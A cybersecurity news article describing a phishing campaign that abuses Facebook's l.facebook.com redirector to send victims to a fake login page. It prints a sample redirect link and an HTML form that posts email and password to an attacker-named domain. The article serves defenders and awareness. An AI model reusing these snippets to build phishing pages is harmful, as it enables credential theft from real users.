New Phishing Attack Targets Facebook Users to Steal Login Credentials

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer

A sophisticated phishing campaign has recently emerged, targeting Facebook users with carefully crafted emails designed to harvest login credentials.

Attackers leverage the platform’s own external URL warning system to cloak malicious links, presenting URLs that appear legitimate while redirecting victims to counterfeit Facebook login pages.

The initial lure arrives as an urgent security notification, warning users of “unauthorized access attempts” or prompting them to verify account activity.

The email’s design closely mirrors Facebook’s styling, complete with social media icons and footer disclaimers, creating a sense of authenticity and leading recipients to click without hesitation.

Phishing (Source – X)

The campaign’s reach spans multiple languages, including English, German, Spanish, and Korean, broadening its potential victim pool.

Phishing URLs consistently follow a pattern of benign domains forwarded through Facebook’s redirector service (e.g., httpst.co/MS24b2xu6p), which then reroute to attackers’ infrastructure.

SpiderLabs analysts identified this technique after examining dozens of email samples, noting how the redirect mechanism both evades link scanners and bypasses user suspicion.

Victims who follow the link encounter a near-perfect replica of Facebook’s login interface, where credentials submitted are immediately exfiltrated to a command-and-control server.

On successful submission, the fake portal executes a brief JavaScript snippet to display an “Incorrect password” error, prompting users to re-enter their details—unwittingly supplying attackers with valid credentials on the second attempt.

The harvested data includes email addresses, phone numbers, and passwords, which are stored in a PHP backend script for later retrieval by threat actors.

Redirect-Based Infection Mechanism

The core innovation of this phishing campaign lies in its abuse of Facebook’s external URL warning system as an infection mechanism.

Rather than linking directly to malicious domains, attackers construct a URL of the form:-

<a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fataloraxmalicious.co%2Ffb.php&h=AT0Xyz…">
  Verify Your Account
</a>

This link leverages Facebook’s l.facebook.com redirect service, embedding the actual phishing site in the u= parameter.

When clicked, Facebook presents a warning banner but ultimately forwards the victim to the malicious page, lending credibility to the destination.

Once on the phishing site, the HTML form collects credentials via:-

<form action="https://ataloraxmalicious.co/fb.php" method="POST">
  <input type="text" name="email" autocomplete="username"/>
  <input type="password" name="pass" autocomplete="current-password"/>
  <button type="submit">Log In</button>
</form>

Upon submission, a JavaScript routine triggers a second redirect back to Facebook, displaying an error notice to the user and minimizing suspicion.

This redirect-based infection mechanism not only bypasses email security gateways but also exploits user trust in Facebook’s domain, making detection and prevention significantly more challenging.

Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.